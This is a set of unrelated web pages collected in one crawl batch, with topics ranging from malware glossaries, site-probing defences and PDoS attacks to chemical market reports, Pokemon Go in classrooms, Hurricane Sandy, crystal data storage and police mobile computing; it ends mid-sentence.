The Java operating principal, based on providing a secured virtual space for each application, almost fully mitigates any possibility of viruses appearing in the wild for this platform. "We haven't got any cause to believe that J2ME is less secure than any other version of Java. However, before making a definitive conclusion, we need time for a number oftests," said Eugene Kaspersky, Head of Anti-Virus Research. "Even if J2ME proves to be an absolutely secure platform, one of the most vulnerable areas in any security system still exists - the human factor. This problem, in turn, can be improved only by constant education."
<urn:uuid:ba61de62-0fbe-4fd3-9304-db1964af450e>
CC-MAIN-2017-04
http://www.kaspersky.com/au/about/news/virus/2000/_Javanization_of_Mobile_Phones_A_Green_Light_for_Malicious_Programs_
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00470-ip-10-171-10-70.ec2.internal.warc.gz
en
0.940491
604
2.75
3
Linear alkylbenzene (LAB) is a vital ingredient for synthetic detergents. Nearly 98% of LAB production is used to manufacture linear alkylbenzene sulfonate (LAS), which is used in household synthetic detergents. The remaining 2% of the demand for LAB comes from other applications, such as agricultural herbicides, emulsion polymerization, wetting agents, electric cable oil, ink solvents, and the paint industry .The Global Linear alkylbenzene market was valued at $5,900.3 million in 2012, and is projected to reach $7,7707.0 million by 2018, at a CAGR of 4.7%, for the given period. This growth will be heavily driven by developing regions because of low penetration and low per capita expenditure on detergents. Alkylbenzene is also known as detergent alkylate, and is converted to linear alkylbenzene sulfate (LAS), which is mainly used as a surfactant in detergents and cleaning products. Linear alkylbenzene is most commonly used as raw material in the production of biodegradable household detergents. It is mainly produced from n-paraffins, kerosene and benzene. A huge portion of alkylbenzene is converted to linear alkylbenzene sulfonate (LAS), which is an anionic surfactant used mainly in household laundry, cleaning products, and in some industrial applications. Heavy-duty laundry liquids principally utilized for commercial laundry purposes are the most dominant users of LAS. Alkylbenzene in small proportion is employed in the manufacture of ink, agricultural herbicides, paint industry, wetting agents and electric cable oil. It is estimated that about 3,752.7 KT of alkylbenzene was consumed globally in 2012, and this demand is expected to reach 4,339.1 KT by 2018, at an estimated CAGR of about 2.5%, from 2013 to 2018. However, the overall market value of alkylbenzene was estimated at about $5,900.3 million in 2012 which is projected to reach a CAGR of 4.7% during the forecast period. The key regions covered in market report are Asia-Pacific, Europe and North America. The various applications studied include linear alkylbenzene sulfate and others. Further, as part of qualitative analysis, the Global Linear alkylbenzene market research report provides a comprehensive review of the important drivers, restraints, opportunities, and issues in the benzene market. The Global Linear alkylbenzene Market report also provides an extensive competitive landscape of the companies operating in this market. It also includes the company profiles and competitive strategies adopted by various market players, comprising BASF SE, BP PLC (U.S), Total S.A., Exxonmobil Corp, The Dow Chemical Company, CPCC, CNPC, JX Nippon Oil And Energy Group, Royal Dutch Shell and SABIC. Along with the market data, you can also customize MMM assessments that meet your company’s specific needs. Customize to get comprehensive industry standards and deep dive analysis of the following parameters: - Market size and forecast - Consumption pattern (in-depth trend analysis), by application (country-wise) - Competitive landscape with a detailed comparison of portfolio of each company mapped at the regional- and country-level - Market size in terms of volume (application-wise and country-wise) - Production Data at country level with much comprehended approach of understanding - Comprehensive coverage of plant capacity estimates that will analyze the future prospects of the Linear alkylbenzene market - Plant Capacities for major countries(by companies) - Analysis of Load factor to understand actual production at country level - Deep Dive Value chain analysis - Raw materials used in making Linear alkylbenzene - Analysis of Forward chain integration as well as backward chain integration to understand the approach of business prevailing in the Linear alkylbenzene market - Impact analysis - Detailed Analysis of various drivers and their impact on the market - Detailed Analysis of various restraints and their impact on the market - The various new opportunities for the emerging players - Detailed analysis of Competitive Strategies like new product launch, expansions, Merger & acquisitions etc. adopted by various companies and their impact on Linear alkylbenzene Market - Trade analysis - Trade data, by country - Import-export data, by each country with other key countries of the world Please fill in the form below to receive a free copy of the Summary of this Report Please visit http://www.micromarketmonitor.com/custom-research-services.html to specify your custom Research Requirement C10-C15 Alkyl Benzene C10-C15 Alkyl Benzene and Anionic Surfactants adds up to total Europe Linear alkylbenzene The European linear alkylbenzene market was valued at $936.8 million in 2012, and is projected to reach $1,139.8 million by 2018, growing at a CAGR of 3.2% from 2013 to 2018. This growth will be heavily driven by developing regions because of low penetration and low per capita expenditure on detergents. Asia-Pacific Linear alkylbenzene The Asia-pacific linear alkylbenzene market was valued at $2,652.0 million in 2012, and is projected to reach $3,530.0 million by 2018, growing at a CAGR of 5.0% from 2013 to 2018. This growth will be heavily driven by developing regions because of low penetration and low per capita expenditure on detergents.
<urn:uuid:a3b638b4-0253-471d-a1d4-f88a4e898de9>
CC-MAIN-2017-04
http://www.micromarketmonitor.com/market-report/linear-alkylbenzene-reports-7626886421.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279468.17/warc/CC-MAIN-20170116095119-00104-ip-10-171-10-70.ec2.internal.warc.gz
en
0.924459
1,229
2.6875
3
A computer worm is a type of Trojan that is capable of propagating or replicating itself from one system to another. It can do this in a number of ways. Unlike viruses, worms don’t need a host file to latch onto. After arriving and executing on a target system, it can do a number of malicious tasks, such as dropping other malware, copying itself onto devices physically attached to the affected system, deleting files, and consuming bandwidth. Downloaders and droppers are helper programs for various types of malware such as Trojans and rootkits. Usually they are implemented as scripts (VB, batch) or small applications. They don’t carry any malicious activities by themselves, but just open a way for attack by downloading/decompressing and installing the core malicious modules. To avoid detection, a dropper may also create noise around the malicious module by downloading/decompressing some harmless files. Very often, they auto-delete themselves after the goal has been achieved. Trojan is a malware that uses simple social engineering tricks in order to tempt users into running it. It may pretend to be another, legitimate software (spoofing products by using the same icons and names). It may also come bundled with a cracked application or even within a freeware. Once it is installed on the computer, it performs malicious actions such as backdooring a computer, spying on its user, and doing various types of damage. Trojans are not likely to spread automatically. They usually stay at the infected host only. Toolbars are software extensions that are visible in the GUI of the host program. In the case of PUPs, the host program is usually a browser. The visible part of the toolbar can vary from one extra button added to the browsers own taskbar, to the bar over the full width at the top of the browser window. Sweet Orange is a type of exploit kit, or in other words, malicious code found on compromised websites with the intention to find vulnerabilities on a computer by which said computer can be infected. In addition to compromised websites, they also operate deliberate traps that users get redirected to. Sweet Orange also uses malvertising, where malicious advertisements are placed on legitimate websites.
<urn:uuid:0f969609-f66f-47cd-9dc6-d7f095fb844a>
CC-MAIN-2017-04
https://blog.malwarebytes.com/threats/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279468.17/warc/CC-MAIN-20170116095119-00104-ip-10-171-10-70.ec2.internal.warc.gz
en
0.934761
455
3.265625
3
Pokémon Go might be the latest fad, but as the school year draws near, many are wondering if the game can be beneficial to students. With the rise of games in the classroom, it seems like a no-brainer to bring Pokémon Go into the classroom. But how can teachers do it? Here are four ways Pokémon Go has been beneficial for teachers, students, and schools. - It’s brought augmented reality (AR) to the forefront. Augmented reality has the possibility to radically change the classroom. Learning about Ancient Rome? Forget looking at artist renderings in a textbook; just take a virtual field trip. Pokémon Go has brought AR into the mainstream and shown its capabilities and the ability to put the technology to use on a large scale. - Teachers can engage students with data. In the game, players are exposed to mountains of data, from how many Pokémon they’ve caught, to where to catch Pokémon, to whether their Pokémon have evolved. K-12 teachers can turn this data into an engaging lesson on statistics, or on a basic level, how to accurately capture and record data. - Creative writing prompts galore. As students spend their free time trying to catch ’em all, English/Language Arts teachers can use students’ exploration and quests to their advantage. Using their Pokémon hunts and battles as writing prompts, teachers can engage students with the written word. Since Pokémon Go already takes place in a fantastical, magical setting, it is well suited to sparking a student’s imagination. - Students can explore the world around them. Pokémon Go offers teachers the opportunity to teach students about the world around them. One major benefit of Pokémon Go is that it requires players to get up and go. They have to walk, explore, and move around to capture and hatch their Pokémon. Teachers can use this to discuss weather patterns, season changes, or even discuss the city or state they live in. Exploring a student’s community can springboard into discussions of climate change or even local history. Sure, teachers won’t want students playing Pokémon Go in the classroom, but if teachers ignore it entirely they will miss out on valuable teaching opportunities. Any learning suggestions you would add? Let us know in the comments?
<urn:uuid:3fde1099-3503-4914-9a43-12b605da42f3>
CC-MAIN-2017-04
https://www.meritalk.com/articles/4-ways-teachers-can-use-pokemon-go/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00406-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950523
461
3.25
3
The east coast of the United States is bracing for a hurricane so severe that it's being dubbed a "Frankenstorm" in many media outlets. Indeed, Hurricane Sandy -- "a late season Atlantic storm unlike anything seen in more than two decades," according to Reuters -- has killed more than 30 people in the Caribbean as it slowly moves north. Obviously you can keep track of the storm via television and Internet news outlets, but if you want information heavy on facts and light on sensationalism, NASA has a website devoted to tracking Sandy. The space agency's Earth-orbiting spacecraft are watching Hurricane Sandy as she churns at 6 mph toward the east coast, where it's expected to land late Monday or Tuesday. The site has the latest videos and pictures taken from space. Here's how NASA describes the storm: Storm surge is expected to be big factor as Sandy approaches the Mid-Atlantic coast. Very rough surf and high and dangerous waves are expected to be coupled with the full moon. The National Hurricane Center noted that the combination of a dangerous storm surge and the tide will cause normally dry areas near the coast to be flooded by rising waters. The water could reach the following depths above ground if the peak surge occurs at the time of high tide. Some storm surge forecasts include: 5 to 8 feet in the hurricane warning area in the Bahamas and one to three feet along the Florida coast in the warning areas on Oct. 26. As of this writing, the hurricane has passed through the Bahamas, but there are no details yet about damage or fatalities. Here's a link to a video of Sandy taken Friday from the International Space Station. You also can watch the video below, depending on whether it shows up. (I see it using Firefox, but not Chrome.) Now read this:
<urn:uuid:b9e1b7fe-81f4-4aa9-874e-a8657f4573a5>
CC-MAIN-2017-04
http://www.itworld.com/article/2719510/hardware/watch-hurricane-sandy-from-nasa-s-orbiting-satellites.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00434-ip-10-171-10-70.ec2.internal.warc.gz
en
0.959547
360
3.125
3
A PDoS or permanent denial-of-service, also referred to as phlashing, is a severe attack that completely damage a system as a result of which the system’s reinstallation of hardware or replacement is required. A PDoS attack exploits the flaws of security which further permits the administration present far away on the hardware of the victim management interfaces, like printers, routers, or other hardware used for networking. If you have any kind of iPhone or similar device, it’s very likely that you have hear or made the jailbreak process in order to be able to control your device better that the manufacter wants you to. After flashing the device hardware limitations and software limitations by replacing some ROM record, you are able to install not aproved apps, set the settings that the normal device is not able to do. All these functions made possible by jeilbreaking the phone are in a good way named PDoS. Permanent denial of service will change the hardware settings in the deep and closed ROM level and allow the hardware to do some new and maybe prohibited task that were limited by the manufacturer. In some other form, the PDoS will use the same technique to destroy the functionality of some hardware component in order to blemish the overall function of the device. The PDoS is a kind of attack in which hardware is purely targeted and it does not require many resources. It’s a fast attack. Many mushroom hackers are attracted towards this method because of its features, and the potential that it holds for high probability of security exploits on Network Enabled Embedded Devices (NEEDs). A PDOS attack damages a system so badly that it requires replacement or reinstallation of hardware. Unlike the infamous distributed denial-of-service or short DDOS attack which is used to sabotage a service or Website or as a cover for malware delivery — PDOS is pure hardware sabotage. An anecdote is saying that in the year 2008 at the EUSecWest Applied Security Conference in London an employee of Hewlett-Packard’s Systems Security Lab namely Rich Smith created a tool called PhlashDance in order to detect as well as demonstrate the vulnerabilities of PDoS.
<urn:uuid:3fa1d438-4ba5-418b-b9b0-0987f9446a9b>
CC-MAIN-2017-04
https://howdoesinternetwork.com/2012/permanent-dos
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00250-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952075
445
2.65625
3
The South American crop protection chemicals market has been estimated at USD 14.1 Billion in 2015 and is projected to reach USD 19.6 Billion by 2020, at a CAGR of 6.83% during the forecast period from 2015 to 2020. Crop protection chemicals also called pesticides constitute a class of agrochemicals that are used to kill plant-harming organisms like pests, weeds, rodents, nematodes etc., and preventing the destruction of crops by them. Any material or mixture that is capable of preventing, destroying, repelling or mitigating a pest can be called pesticide. Herbicides, insecticides, insect growth regulators, nematicides, termiticides, mollusicicdes, piscicides, avicides, rodenticides, predacides, bactericides, insect repellants, animal repellants, antimicrobials, fungicides, disinfectants, sanitizers and their bio counter parts all come under the classification of pesticides. Pesticides are used in crops as well as non-crop plants like turfs and ornamentals. They can be broadly classified into four groups depending on their usage. Farmers use herbicides for killing unwanted plants called weeds, insecticides for killing insects, fungicides for treating diseases caused by fungus and other pesticides for treating diseases, which are not caused by fungi or insects. Herbicides accounted for more than 54% of total pesticides sales in 2015. Pesticides market is driven by the need to increase crop yield and efficiency. The region’s population is growing, but the farmlands have been decreasing pushing farmers to increase their yields. New farming practices are adopted by farmers to increase crop yields. Genetically modified (GM) plants have helped farmers increase their yields coupled with the reduction of use in some pesticides. Bio pesticides adoption is also occurring all over the region, especially in developing countries of Brazil and Argentina. Demand for organic and completely natural foods is increasing at a high rate and inevitably bio pesticides consumption has to be increased. Pesticides help in optimal usage of resources for plant growth and protect the crop from various pathogens. Some pesticides repel animals coming towards them with the help of pheromones. New farming practices require new crop protection products. The research and development costs are escalating. For previously mentioned reasons, investment for companies is high on new products and they are wary of returns. Per capita usage of pesticides is low in developing countries because of costs. This poses a threat to companies, as their market reach might not follow desired growth patterns. Shrinking farmlands are also threat in the form of less usage of pesticides. The market is classified based on the application into herbicides, fungicides, insecticides and other pesticides. They are further segmented depending on their chemical origin: bio pesticides and synthetic pesticides. Diverse pesticides range are used in agriculture and farming. Pesticides are also segmented by their usage in crops like cereals, fruits etc. Non-crop utilization of pesticides in turfs, ornamentals and others is also studied. Market study indicated that Cereals and grains consumed the highest market in the use of pesticides. This can be attributed to the food safety and wide variety of uses of cereals and grains. The market is also segmented geographically into Brazil, Argentina and others. Brazil has the largest consumer base in the world. Argentina follows the list. The rising disposable income levels, rising population and food security have made Brazil, the country with maximum potential for growth. The low affordability and explicit cost cutting measures of farmers in developing and under developed countries hinder the real potential of the market. Decreasing farmlands and increasing population pose a serious threat to food security. Recently, grains are also used to produce bio fuel and this poses a risk to food security especially in developing and under developed regions where price drastically influences consumption. Pesticides help to increase farm yields and still have a large scope to improve the overall agricultural production of the region. The major companies in crop protection chemicals are Syngenta, Bayer, BASF, DuPont, Dow agrosciences, Monsanto etc. The current trend to survive in the market is the research and innovation route for major companies. Major companies also export many banned pesticides in USA to these countries. All major companies are investing profoundly in new product development to keep up with competition and gain market share. Pesticides were prominent for increased agricultural yields and will remain so in the coming years. Key Deliverables in the Study
<urn:uuid:54cde492-aa7b-48d9-b99e-bb03c1bb9578>
CC-MAIN-2017-04
https://www.mordorintelligence.com/industry-reports/latin-america-crop-protection-pesticides-market-industry
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00250-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955879
907
3.046875
3
Site scanning/probing is the initial phase of any attack on Web applications. During this phase, the attacker gathers information about the structure of the Web application (pages, parameters, etc.) and the supporting infrastructure (operating system, databases, etc.). Target Web sites are scanned for known vulnerabilities in infrastructure software (such as IIS) as well as unknown vulnerabilities in the custom code developed for the specific target application. Site scanning/probing is the main technique attackers use to gather as much information as possible about a Web application and the supporting infrastructure. A standard site scan is composed of several steps. First, the attacker detects the operating system installed on the server. This can be done using automatic tools like nmap, by identifying the Web Server type in the HTTP Request (for example, IIS runs on Windows-based sites) or by guessing according to file extensions. (Usually, Windows-based sites use ".htm" and ".jpg" files, whereas UNIX sites use .html and .jpeg files). Identifying which Web server runs on the target machine is very useful to the attacker. Knowing the specific type of Web server (and by extension its default configuration), an attacker may try to exploit known vulnerabilities, access sample files, and try default user accounts. There are three common ways of detecting the Web server: by using automatic tools such as Nikto, by identifying the Web server type in the HTTP Request, or by guessing according to files suffixes (ASP Pages normally indicate an IIS Server whereas PHP Pages normally indicate an Apache server). Additional important information about the infrastructure of the target server can be gathered using probing techniques such as path revealing, Directory Traversal and remote execution (may allow mapping the entire site and its source). The attacker can complete the Infrastructure knowledge base by identifying database server types, content infrastructure types (WebSphere, BroadVision and Vignette), and so on. After the attacker analyzes the infrastructure, the entire application can be scanned. Application scanning provides a map of the entire site including: all pages, parameters used by dynamic pages, cookies used by the site and transactions flow. This information leads the attacker to an understanding of the application's authentication, authorization, logic, and transactional mechanisms. This body of information provides the basis of a strategy to attack the target site. |Solution||Blocks site probing?| |Imperva SecureSphere||YES (known and unknown attacks)| |Firewalls||Some/Partial (known attacks only)| |Intrusion Detection Systems||Partial detection only, known attacks only| |Intrusion Prevention Systems||Partial (known attacks only)| During site probing the attacker performs several operations: Generating errors using non existing URLs This type of activity can only be detected by products that learn which URLs are allowed by each specific application. Intrusion Detection and Prevention Systems that are not Web application oriented do not implement this capability. Providing long parameter values In order to detect long parameter values the product must know the length constrains on each parameter. This requires learning parameters' constrains. Intrusion Detection and Prevention Systems that are not Web application oriented do not implement this capability. Accessing unauthorized parts of the application In order to detect unauthorized access (e.g. /iisadmin/ and /iissamples/) the product should gain knowledge on which parts of the application are authorized and which are not. Only products that include learning capabilities can gain that knowledge. Adding and removing parameters To detect this behavior the product must understand which parameters are used with each specific URL and which are required. Intrusion Detection and Prevention Systems that are not Web application oriented do not implement this capability
<urn:uuid:12dbf049-66d8-4afb-975f-927092ef38b4>
CC-MAIN-2017-04
https://www.imperva.com/Resources/Glossary?term=site_scanning_probing
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281332.92/warc/CC-MAIN-20170116095121-00158-ip-10-171-10-70.ec2.internal.warc.gz
en
0.876206
763
2.9375
3
That's because %u is an "unsigned int" -- but you've used a (signed) long long instead of an unsigned int. You need to use %lld (ll=long long, d=integer). printf("num = %017lld\n", num); On 1/29/2010 5:20 PM, hockchai Lim wrote: ok. Now, I'm having problem converting this long long (64 bits) num back to a string. I use %017u and it gives me a 00000000000000001. Why oh why (can't c be a bit smarter :). long long num; sprintf(sBuf, "6027461692 "); num = atoll(sBuf); printf("num = %017u\n", num); // the result num = 00000000000000001
<urn:uuid:5ebec5ef-b82c-454b-b13c-dc149a473150>
CC-MAIN-2017-04
http://archive.midrange.com/c400-l/201001/msg00017.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00278-ip-10-171-10-70.ec2.internal.warc.gz
en
0.705168
184
2.546875
3
This handy cheat-sheet helps keep you straight on evolving storage terminology. Use this handy cheat-sheet to help keep straight the evolving list of storage terminology. Direct-attached storage (DAS) Storage connected directly to a server. Fibre Channel An expensive short-distance networking technology used for building SANs. ATA (AT attachment) or IDE (Integrated Device Electronics) Traditional desktop and low-end server storage technology that includes the controlling circuitry for mass-storage devices as part of the devices. This technology is one of the standard ways of connecting hard drives, CD-ROM drives, and tape drives to a system. iSCSI A low-cost way to create SANs over IP networks. IP SAN A SAN built around the iSCSI protocol. Network-attached storage (NAS) A storage appliance that connects to the Ethernet network and provides file-level storage access. RAID (Redundant Array of Inexpensive Disks) The name for a number of different fault-tolerance schemes that use drive arrays. SCSI (Small Computer System Interface) The de facto standard for midrange and high-end server direct-attached storage. Serial ATA (SATA) A new low-cost storage standard with faster transfer speeds than IDE/ATA. Serial-attached SCSI A new high-performance SCSI standard. Products will appear late this year. Storage area network (SAN) Typically a Fibre Channel subnetwork of storage devices that can be shared by several servers.
<urn:uuid:216fd431-5fc8-43fb-887c-c9977cb0deaf>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Data-Storage/Know-Your-Storage-Technologies
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00094-ip-10-171-10-70.ec2.internal.warc.gz
en
0.868124
316
2.734375
3
Researchers at the University of Southampton in the U.K. say they’ve been able to etch some of mankind’s most famous documents on a “5-dimensional” crystalline storage medium estimated to have a lifespan of billions of years. The researchers used self-assembled nanostructures created in fused quartz crystal to store data in five “dimensions,” writing each file in three layers of nanostructured dots separated by five micrometers of blank space. The data is encoded using the standard three dimensions of width, height, and depth. The fourth and fifth “dimensions” assign values to the size of the data “dot,” and how it is aligned. That all works out to a theoretical data capacity of 360 terabytes that can be stored in the dimensions of a conventional disc, like a DVD, the researchers said. The fused quartz essentially lasts forever, or 13.8 billion years at 190 degrees centigrade. It’s also thermally stable up to 1,000°C, the researchers claim. Why this matters: The Superman comics and movies showed how the native Kryptonians stored their stored knowledge on crystals, which young Kal-El (Superman) was able to access in his Fortress of Solitude. So yes, it’s really pretty cool to see these “Superman crystals” become reality. What we truly need, though, is an archival storage medium that can be read decades down the road. Who has a floppy disc drive any more? Or even a CD-ROM reader? The cloud is one solution, but only if we trust our personal information will be safe for generations in the hands of businesses who may or may not care that our digital lives are preserved. A permanent record The problem with the media that we’ve come to associate with computers is that most older formats simply aren’t permanent. According to the National Archives, magnetic media (tape) typically last between 10 and 50 years. Pressed discs, such as you might buy as a game or a piece of software, may last “generations” if preserved well. But recordable discs can be unreadable in as little as a year, if the organic dyes used to store your data deteriorate to the point where they become unreadable. M-Disc technology, which is now supported by numerous Blu-ray and DVD burners, was created to solve this problem, too. It uses an inorganic layer as a way to preserve your data even longer—up to 1,000 years, the company claims. But each disc only holds 4.7GB, and a 50-pack (or a bit more than 200GB) costs $140. (M-Disk also supports 100-GB Blu-ray compatible discs, for $20.50.) But that’s the price you’ll pay for near-permanent data storage. That’s the goal that the Southampton researchers also hope to accomplish. “It is thrilling to think that we have created the technology to preserve documents and information and store it in space for future generations,” said Professor Peter Kazansky of the university’s Optoelectronics Research Center, in a statement. “This technology can secure the last evidence of our civilization: All we’ve learnt will not be forgotten.” The 5D “Superman crystals” technology was first proven out in 2013, when a 300-kilobit file was encoded. Now, the researchers have encoded the Universal Declaration of Human Rights, Newton’s Opticks, the Magna Carta, and the King James Bible using the technology. The Southampton team plans to present a paper on the subject at the International Society for Optical Engineering Conference in San Francisco this week, where hopefully questions will be asked and answered on two issues: exactly how fast data is encoded and read, and the projected cost of such a solution. The researchers also say that they're looking for a company to help commercialize the technology. The Southampton ORC released a video showing the encoding process, which uses what the researchers claim is a “ultrafast” laser. However, it’s just not clear how fast data can be read and written to the medium. Still, the goal here is to create a permanent means of storing information, not a fast one. if such a process could be made viable, it’s not impossible to believe that humanity could build another Great Library of knowledge, one that could last virtually forever. Correction: An earlier version of this story implied that M-Disc only supported 4.7-GB DVDs; the format supports up to 25-, 50-, and 100-GB Blu-ray discs, This story, "Permanent 'Superman crystal' holographic storage is etched with the Bible, Magna Carta" was originally published by PCWorld.
<urn:uuid:2a8e4b59-075a-4e92-932f-762cecf8de95>
CC-MAIN-2017-04
http://www.itnews.com/article/3033071/storage/permanent-superman-crystal-holographic-storage-is-etched-with-the-bible-magna-carta.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00094-ip-10-171-10-70.ec2.internal.warc.gz
en
0.927633
1,024
3
3
In 1995, Will Davis, police planning manager for the Scottsdale Police Department in Arizona, hunched over his computer and wrote a paper titled "Mobile Technology 101." While typing, Davis imagined how the application of burgeoning mobile technologies would change law enforcement before the rollover into the new millennium. Surely it did not take much imagination to see that police officers would soon see their jobs transformed through the advent of mobile technology. However, in the five years that have passed, the use of mobile technology -- coupled with the power of wireless communications -- in law enforcement has failed to live up to its promise. True, hundreds of agencies nationwide have rolled out a startling array of laptop computers into their patrol cars. But, in many cases, the computer's power is barely tapped. "Ideally, the patrol officer should be able to access crime maps, street maps and incident reports. They should be able to make queries from their laptops for license-plate, drivers'-license and criminal-history data, and they should have car-to-car messaging and vehicle locators that show them where fellow officers are at any given moment," said Davis. "This is where I thought we were heading five years ago, and it is still where we are heading today. But it has taken longer to get there than I expected." That sentiment is echoed throughout departments nationwide. Few law enforcement professionals dispute the validity of the mobile-technology vision, yet the vision has remained elusive. The reasons are myriad -- everything from money, or lack thereof, to legacy systems has played a part in slowing progress toward the ideal mobile-patrol office. The first mobile radios were installed in black-and-whites in 1936, and by the 1980s many patrol cars were utilizing mobile-data terminals. These mobile-data terminals (MDTs), often referred to as "dumb terminals," were green-screen technology with limited capabilities. Used by other public safety agencies -- like paramedics, ambulance companies and fire departments -- they primarily allowed for visual dispatching over radio networks. In most cases, the actual dispatch came both by voice and data because of the normally unreliable nature of the early MDTs. Still, a working MDT allowed the user to refer to the dispatch address and to see where other units were going. For law enforcement, it was also the first effort at running tag and other basic data checks on suspects though, again, most officers continued to rely on the dispatcher for information. "We have no 'dumb terminals' anymore," said a jubilant Davis, conveying the news that all of Scottsdale's MDTs had been replaced with fully functional Panasonic laptop computers. With 130 laptops in the field, it is a goal to be proud of, but this technology advocate is quick to note that the road has been long and difficult. "It has taken us years to get rid of the MDTs, and we are still not using the laptops the way we would like to." In fact, some agencies point to the years of MDT history as being one factor in limiting law enforcement's full use of mobile computers. "Those MDTs were around for a long, long time, and it has affected the veteran officer's perception of what technology can do," said Terry Armstrong, director of information management of the Monroe County, Fla., Sheriff's Department. Armstrong, who has been testing mobile computers in the Sheriff's Department since 1996, said he felt fortunate to have started with a clean slate. "We never had mobile computers until 1996, so the officers are open to playing with them and seeing what they can do." Dollars for Tech Geeks There is a certain sense of irony in realizing that in a decade when the Department of Justice has thrown billions of dollars at state and local law enforcement -- much of it earmarked specifically for mobile and wireless technologies -- a lack of funds may be the primary roadblock to law enforcement being completely wired. The COPS MORE grant program -- the primary funding vehicle for technological advancements in law enforcement for many years -- was structured so that generous grants were easy to land, and has certainly furthered the high-tech transformation in law enforcement. The problem, though, is that the grants program funds hardware and software, not "people-ware." Most police and sheriff's departments struggle daily with putting enough officers on the street to combat crime directly and ensure a highly visible presence to the public. Back-office personnel, the records clerks, civilian management and information technology personnel necessary to keep a modern agency humming along, are situated far down the financial food chain when elected officials vote on annual department budgets. Simply put, a police chief has a much better chance of getting money for two more sworn officers then he does for a single programmer. The grant money keeps coming in and departments keep launching new tech projects, but the same small team of IT professionals is expected to shoulder the load of increasingly complex implementations. It should come as little surprise that the projects often stutter and stall. Scottsdale has a records management system (RMS), a wireless system, computer-aided dispatch and a laptop project all under way. "Every time a grant opportunity came up, someone applied and we got all of them. Ideally, we should have a separate project manager over each one. Instead, I run them all," Davis said. What Davis didn't mention is that while running four or more major implementation projects, he also continues to act as the department's troubleshooter and help desk for all technologies, and the coordinator for the department's Y2K preparations and response team. "We get by with temporary-duty (TDY) personnel mainly," said Karl Maracotta, a police officer and temporary-duty assignee in the Fort Lauderdale, Fla., Police Department's MIS department. Fort Lauderdale is shouldering a tech-implementation load similar to Scottsdale's. "It would help if we could at least get long-term TDYs but, mostly, they come and go." A Living Legacy Given the staffing load, it is a wonder many of these projects have made it to implementation. In fact, while it is more the rule than the exception to find officers with a laptop in their cars, the level of use varies widely. In many departments, the computers act as little more than an MDT -- allowing for simple license-plate and name search engines through National Criminal Information Center and state databases. In a few departments, the computer has the added capability of offering a redundant dispatch system, in which an officer receives a radio dispatch and a digital dispatch on the computer, and officers can also send car-to-car messages. In a handful of departments, the officer can also write his reports in the field, saving numerous trips to the department headquarters. In a very few departments, if any at all, that report goes directly into the department's RMS. And in none are officers regularly able to remotely access digital images, such as maps or mug shots. The main obstacle to this next generation of law enforcement technology is the legacy systems currently in place. "The officers can do their reports in the field and they can wirelessly transmit those reports to the office," explained Sgt. Michael Gregory, who is in charge of Fort Lauderdale's technology projects. "But then they are printed out on the laser printer and records clerks enter the reports into the RMS." Fort Lauderdale is striving toward having those reports move through a paperless approval process and straight into the RMS, but like many departments -- Scottsdale included -- there is no adequate translation technology to interface new report-writing systems with an old, closed architecture RMS. That next step of seamless data translation will have to wait until departments manage to replace their old RMS with modern, open-architecture systems compatible with their laptops and report-writing software. "Right now, our officers print reports out in the office, using an infrared port. Eventually, the goal is to send it electronically," added Davis. "We just haven't been able to manage the data mapping necessary to get our report-writing system to communicate with the RMS." As for the transmission of highly complex data over the wireless networks, the challenge is even more daunting. "About 13 years ago, Scottsdale invested in a new, multimillion-dollar wireless infrastructure for dispatching and radio communications. That system is now also the backbone for our wireless laptop communications," explained Davis. "The transmission rate on the system is 4,800 baud and if we tried to send huge amounts of data -- like maps or photographs -- it would just clog and stop. But covering the expense to replace the system is something that is quite a ways off yet." For some departments, the solution to overloaded radio networks has been to turn to cellular digital packet data (CDPD) technology. CDPD offers several distinct solutions for law enforcement and a low entry cost, but it also can be a tough political sell. "You just pay for your modems and pay a monthly fee," said Sgt. Jeff Pauley of the Maryland-National Capital Park Police and a strong CDPD advocate. "On top of that, there are zero maintenance costs; the transmission rate is consistently fast -- easily able to support graphical data; and it provides a redundant back-up to your traditional radio dispatch system." Still, for a lot of departments, especially in lightly populated states, there is just not sufficient private tower coverage to support CDPD. In those that have the coverage but still shy away from CDPD, it is often because the department is reluctant to develop a reliance on a privately-owned network over which they exercise no control and where the cost is ongoing. For CDPD advocates, however, these objections hold little water. "Wireless radio networks cost millions. If you build it and find out you have a blank spot in your coverage, you pony up another bucket of money to build an extra tower," said Pauley. "If I have a blank spot, I just complain to the provider and they put up the tower out of their pocket. When technology advances, who pays to upgrade the network? They do. No more getting trapped by a legacy system that becomes outdated. "For 10 years or less use, a private CDPD network subscription is more cost-effective than a publicly owned wireless radio network," Pauley said. "What we have seen is that the effective life of any network, given the pace of technological change, is certainly 10 years or less, so we chose CDPD." We Shall Overcome Despite the obstacles, local law enforcement continues to move forward into a wireless world. Florida, with its statewide criminal justice intranet (CJ-Net), built and maintained by the state's Department of Law Enforcement, is surfing on the crest of the wave. Over this backbone, local agencies have access to each other's criminal-history and graphical databases through Web-browser technology. Other states, like Kansas, have built or are in the process of building similar networks. "The state pays for it, maintains it and provides the backbone free to us -- that is the key," said Monroe County's Armstrong. "We use the backbone to get into Miami-Dade's criminal history [database], because a lot of our criminal traffic comes from there -- and Key West uses our mug-shot and criminal-history data. In addition, we wrote a line-up program in-house that resides on our server and is available to any agency in the state over CJ-Net." Perhaps Jonathan 